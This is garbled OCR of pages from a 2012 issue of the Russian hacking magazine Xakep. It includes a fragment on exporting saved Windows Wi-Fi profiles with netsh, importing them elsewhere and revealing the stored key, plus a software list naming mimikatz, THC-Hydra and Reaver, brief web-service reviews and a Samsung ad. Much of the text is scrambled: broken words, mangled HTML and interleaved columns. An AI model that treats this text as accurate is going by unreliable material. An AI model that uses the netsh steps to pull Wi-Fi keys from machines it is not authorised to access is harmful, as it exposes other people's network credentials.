щие настройки простой командой

консоль с параметрам и:

show>>. --d bg

--staгtvm

что можно

залить новую прошивку, зайти с логином­

1. Запустить виртуальную машину через

ViгtuaiBox

nvram . Получается,

<VM

них инструментов. Подсистема Wiпdows

<<nvram

Но, опять же, это лишь один конкрет­

netsh wlan show pro fi les

ный случай.

паmе>

Любой профиль можно экспортировать, чем мы и воспользуемся: с

Cl·

netsh wlan export profile

па m е="< и мя

профайла>" •

...

~Comput«<Sty1t

,.. St~lt' tlemtn t .st yle{

• (opy r \Qht(t)Z0 10 ,l01t 1 8Н (OI'p0f'<lt\01'1

В результате будет создан ХМL-файл, где будут сохранены настройки для

1' <}\t"'\:> .. <heod>_ c/~d> ., <Ьоdу

onlood-" onloo6() ",. нt.. " Ьutton-stort-stuff ·

<input

tYPt•"Ьvtton"

конкретного соединения, включая ключ

vol .. ~" stort

cotor :

stuн ·~

8 Ы~оt;

<thl> thiSISog reenhl <ihl>

<hl cl o ss•" Ыue "> thi. s ts oЫue h l <lhl> <hl stylt-"co\or:red"> this i.s oreoht <lhl>

~·~

.. !!'Cirgin : O. St"': "'Irgtn-left : lt"';

.. <P>- <IP>

<P> test <lp>

e ~c ep t tons

tn

"'CCrgin - lt~t :

co\\ tюck s:

\6- " output "н/dtV>

</Ьоdу>

~>Pro~nlt~

<lht"'\>

• Ьоdу

hi .Ы~

1> t\·tnt

Ll~tf'nl':r~

импортировать в другой системе и таким

.. .

this is

а Ьlue

this is

а

f:iomc tt·~t . >

I C\1 _

d«:VO!e'lt OOdy. н y\t>.Ьo( < IJf'O\IMCoto~ ..

[правда, в зашифрованном виде). Что с этим делать? Во-первых, профайл можно

образом получить готовые настройки для

pc:ddн~g-\eft : 0 . 8t'"l;

"'~

hlml

Rt·ecn

1~ ;

poddн~g-\eft : 0.8t"'':

• <d\Y St)I\~ " "'CCf'9\tl•\tft: l t!ll">-<fdiV>

Q.

а

> paddн~~j~ : 0.4м:

• <P>- <IP>

<div

this is 111

hl{

hl

red hl

•fllll<' " ' '''"' 11'1"1 .

подключения к сетиl

netsh wlan add profile файла

с

filе п а m е= " <имя

п рофайлом . хml"

:щtl ~0111 <' hulcl

_

~ p\nk "

Но это еще не все. Е сли после импорта профайла открыть настройки подключения и перейти на вкладку << Бе зопасность>>, то ты увидишь поле для ввода ключа, запол­

ненное звездочка ми. И теперь, внимание, магияl Рядом же есть галочка, позволяющая

Weinre

очень по х о ж на

FireBug

и

Web lnspector, но

предназначен для удаленной отладки

отобразить все символы ключа :). ::С

ХАКЕР

142

www.epidemz.net

04 / 159/ 201 2


k-

Mahout 0.6

Mono 2.10.8 Netty 3.3.1 Opentbs 1.7.5 Panda3d 1.8.0 Parrot 4.0.0 Rails 3.2 Sabredav 1.5.7 Ujorm 1.22 Wro4j 1.4.4

ВFТ

- Browser farensic tool Browser Forensic Т ool

Browzar 2.0

codesensor

РНР

Aard Dictionaгy 0.9.3 AIIDup 3.4.0 DispliJYFusion 3.4.1 Evernote 4.5.3.61 31 Everything 1.2.1.371 FilePro 1.0 НоеКеу 1.13

lronWASP

Ma_gicTree 1.1 mimikatz 1.0

> MISC

1Ьу1 1.75 Audacity 1.3.14 AutoBrake 1.07 CamSpace 8.95 Capture2T ext 1.1 О

Psi 0.14

Omea Reader 2.2

Crossloop 2.82 Fiddler 2.3.9.3 Lanshark 0.0.2 Lunascape 6.6.0 mRemote 1.50 NetWorx 5.2.2

>Net дutoPu ттv 0.24.2 Awasu 3.0 Cookienalor 2.6.41

SkypeAutoRecorder Songr 1.9.33 TagScanner 5.1.61 О Tunatic 1.0.1 Ь Videolns~or 2.3.0.126 VLC 2.0

Picasa 3.9

Free Audio Editor 2012 mpTrim 2.13 music2pc 2.12

Format Factory 2.90

Uhub 0.3.2 W3perl 3.141 Yate 4.0.0

Nvidia 295.20 Pl-kernel 3.2.5

Cathode 1.2.0 Docker 1.6.7 Gruml1.1 flyperDo~k 1.2

Que 1.3.1 RCDefaultApp 2.1

Samhain 3.0.2

Libreoflice 3.5.0.3 Libvpx 1.0.0

О. 7.3

Mathomatic 15.8.0 Qpenshot 1.4.2 Pinta 1.1 S~acelm 0.7.0 Vlc 2.0.0 Windowmaker 0.95.2 Zile 2.4.6

Macrofusion Mapsurfing

THC-HYDRA v7.2 0.2.2.35

untidy Vpnd 1.1.4 WeBaCoo 0.2.2 zzuf 0.13

Trupax 6 uniofuzz

Тог

VLC 2.0 WhatRoute 1.10.7

Tunati c 1.1

Syrinx 2.5.0

Resuminalor 1.0

Еуе

1.0

Ргеу

2.1 0.5.3

Not~y

Private

Netilera 1.0

Reaver 1.4

Cinnamon 1.2

sipvicious 0.2.7

···-----·-·

Key Remap4 Ma cBook 7.5.0 Mou se Server 2.6.9

Cdcat 1.8 Cdemu 1.5.0

Ccextrac\or 0.60

Heimdal Nessus 5.0

Bib2xhtml 3.0 Blender 2.62 Bгl-cad 7.20.4

>D~Sktop iZip Archiver 1.4

»МАС

Bluelog 1.0.2

codesensor

Windows Surface Scanner 2.20

Dot0o1Pwn 3.0 DPScan FuzzOps-NG Fwknop 2.0 Gnupg 2.0.18

CentOS 5.8

AlienVault

»UNIX

>X -di str

>S~cu rit_y_

Alick 2.20

Startup Master

Quotatool 1.4.12 Rally 0.5.5 Spacewalk 1.6 Wayland 0.85.0

Procmeter3 3.6

System Ninja 2.3.1.0 USB OЫivion 1.7.0.0

Sim~le

Process Explorer 15.13 Data Backup 7.0

Tomuss 3.1.7

MouseWrangler 1.0.2

Mesa 8.0 Mondorescue 3.0.0

Limitcpu 1.5

Pcap~pdump 0.2 Otm 1.3.7 Rdp-runner 0.1.17 Sflphone 1.0.2 Spgt 0.7.1

>Sys tem Alsa 1.0.25 Bclg2 1.2.1 Clonezilla 1.2.12-10 Fuse-exlat 0.9.6 Kccmp 0.3

Lighttpd 1.4.30 Mysql 5.5.21 Nsd 3.2.10 Openldap 2.4.29 Openvpn 2.2.2 Postlix 2.9.1 Postgresql 9.1.2 Pure-ltpd 1.0.35 Samba 3.6.3 Sendmail 8.14.5 Snort 2.9.2.1 Sqlite 3. 7.1 О Squid 3.1.19 ~yslog-ng 3.3.4 Vslt~d 2.3.5

Nat-traverse 0.5

Liferea 1.8.0

NTFS Permissions Reporter 1.0.0

DSynchronize 2.30.2

Disk lnvestigator 1.31 Driverldentifier 3.9

>System ClipboardZanager 1.0 CPU-M Benchmark 1.0 DHE Drive lnlo 3.2.493 Disk Bench 2.6.2.0

File Extension Monitor 1.4

О. 7Ь

> N ~t_

Ajaxplorer 4.0.3 Bitlbee 3.0.5 Chrome 17.0.963 Dxirc 1.00.0 Gleedline 1.0 Gnubill2.2.14 Leechcralt 0.5.0

>Multimedia

timeEdition 1.1.6 Workrave 1.9.4

PyCmd 0.8 RegScanner 1.85 StExBar 1.8.3 Synergy 1.3.8

Process Blocker

LastPass 1.90

HotKey Resolution Changer 1.5

SIPVicious 0.2.7 uniofuzz Unioluzz 0.1.2 unlidy untidy beta 2

PEBrowse Professional 10.1.4

Nessus 5.0

Heimdal

Fuzzware 1.5

CodeSensor 0.1 DPScan FuzzOps-NG

NSIS 2.46 5.4.0 ру2ехе 0.6.9 RapidSVN 0.12 RubyMine 4.0 SWI-Prolog 6.0.1 Т extPad 5.4.2 TortoiseSVN 1.7.5 Xdebug 2.1.3

Highli_ght 3.7 Kotlin 0.1.429 Lgi 3.4.0 Libpki 0.6.7 Libpng 1.5.9 Lrc 0.7 Lua 5.2.0

AJAX Crawling Tool

>Security

Wuala

-·-···

Dovecot 2.1.1 Freeradius 2.1.12

Apache 2.2.22 Aslerisk 10.1.3 Bind 9.8.1-р1 Cups 1.5.2 Dhcp 4.2.3-р2

Execline 1.1.3

>Server

··-····· · ··· - ··· .... _4_, ___

Anjula 3.2.2

-

>Devel

Microsoft Visual Studio 11 Beta

Spilly 0.5.11 The Dude 3.6 TighiVNC 2.0.4 UliraSurl 11.04

Dependency Walker 2.2 DJ Java Decompiler 3.12.12. 96 Free JavaScript Editor 4. 7 Frhed 1.6.0 HxD 1.7.7.0 KompoZer 0.8Ь3

»WINDOWS >Developmenl

www.epidemz.net

11

",.,-

··--····- ---- ---··· ------------------------··· ... ...... •...

----

-- ..

-~

~

1

----~

--f:

=-~


UNITS/WWW2

i+lei:it•i vox. io П охоже, что пои ски достойной а льтернатив ы

Skype'y, которая не требов ала бы уста­ Vox.io работает через браузер и

новки д еск топн ого клиента, ус п ешно завершились.

п оз воляет бесплатно осуществл ять виде о- и голосовые звонки другим пользователям .."--

сервис а, устраивать конференции с неск о ль кими участн иками и по впо лне nриемле­

I'J- -

мым ценам звонить н а городские и мобильные телефон ы. Чтобы п озвонить на твой

vox.

iо -аккаунт не обязательно даже регистрироваться,- т ы можешь расш арить специ ­ альную ссылку, открыв которую, люди получ ат во зможность быстро набр ать твой виртуальный ном ер. Кроме того, создатели серв иса активно занимаются разработкой мобиль ных nриложений для разных платформ, н о пока релиз доступен только для

iOS.

Skype в брау зе р е

N$J4dЦ.i x m aгks.com П о ле з н ость этого се рвиса для тебя опре д еляется простым критер ием: используешь

__...

ли ты закладки?

..... ·-·.... .. --·-

. ,...,........ ..-

Xmarks умее т тольк о

одно- синхронизировать букмарки между ком­

пь ют ерами и разными браузер ам и IFiг efox, Chгome, ln teгne t Е х рlогег и Safaгi], правда для этого прид ется установить специальные расширения. Е сл и запла т ить неболь­

.-,.=:--

шую де нежк у 112$ в год], то м ож но синхронизировать закла дки еще и с моби льными устройст вами. Тут стоит отметит ь , что инструменты реализованы очен ь каче ственно: сразу чувствуе т с я опыт разрабо тчик ов, в пор тф еле кото рых есть такой замечательный

-~

сервис как менеджер п аралей

LastPass.

Гр а мо т н а я с ин х рони за ция з ак ладо к

ii•M•i!JI I OadS . I П

Скорость работ ы сайта для пользователей из разных стра н напрямую зависит от географическо г о р асположения да та-центра, где находится хос тинг. Ч ем дальше фи­

зически находится сервер, тем больше будет задержка при открыти и сайта. Она может быть и несущественной, но все равно чувствуется. Сервис

loads .in

позволяет прове­

рить скорость загрузки nроизвольнога ресурса из самых разных точек мира . П ричем инструмент помимо сетевой за держки учитывает еще и время рендери н га страницы браузером: можно с равнить за меры для F iгefox, Chгome, Safaгi, lnteгnet Е хрlогег. К тому же есть возможность nосм отреть, как выглядел загружае мый сайт в каждый момент загрузки- в ви д е последов ательнос ти скриншотов.

Б е нчм а р к дл я за м е ра прои з водит е льности сайта

lalblё);Jfillli Diagram.ly о

Этот сервис буд ет далеко не первым среди онлайн-инструментов для создания раз­ личных ди аграмм и схем, но что его отличает от многих других- так это максимальная

схожесть с известным т ·о-

о­ о-

о-­

о-

о--

Microsoft Visio.

Это почти полная копия. Порой даже забываешь,

что имеешь дело не с обычной программой, а сонлайн -серви сом -настолько здоро-

во реализован интерфейс.

Diagramly-

настоящий

must have

на случай, если нужно

создать схему или иллюстрацию для курсовой или дипломной работы, статьи в журнале или поста в благе. Блок-схемы, диаграммы баз данных, схемы локальных сетей, схемы

электрических цепей- всего в базе

Diagramly более 70 категорий элементов .

Р е д ак тор схем и диагр а м м

ХАКЕР

www.epidemz.net

04/159/2012


~СКАЯТЕРРИТОРИЯ

\-

~

'

www.epidemz.net

.


Мобильная печать? Проще простого!

ML-2165W

Управляйте беспроводной печатью с различных мобильных устройств:

Мобильная печать на раз, ава, три!

планшетов, смартфонов, медиаплееров и ноутбуков Технология мобильной печати Samsuпg делает печать с м обильно го устро й ств а еще проще и быстрее! Печатайте документы, веб-страницы , фотографии и вс е, что захотите!

1. '!становите

Не сложнее,

2.

Выберите

3.

nечатайте

чем нажать

1

В категорим ссБытовая электроника. За миновации в сервисе», 2 для достижения намлучшего качества печати исполь зуйте

только оригинальные картриджи

Samsung.

MoЫiePrint

-

мобильная печать ,

просмотр. Функция мобипьной печати доступна на принтерах Samsuпg

Единая слу•ба поддер•км :

8-800-555-55-55

Print -

nечать ,

ML-2165W/2168W

(зво но к по России бес п латный) .

Preview м МФУ

Права потребителей '

предварительный

SCX-3405W/3405FW.

www.samsung.com

Кеер

и качество обслуживаниSl

lt Real'

Узнайте больше о новинке в фирменном магазине Москва , ул . Тверская , д . 22

www.epidemz.net

Т овар сертифи цир ова н . Ре кл а м а .

Samsung


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.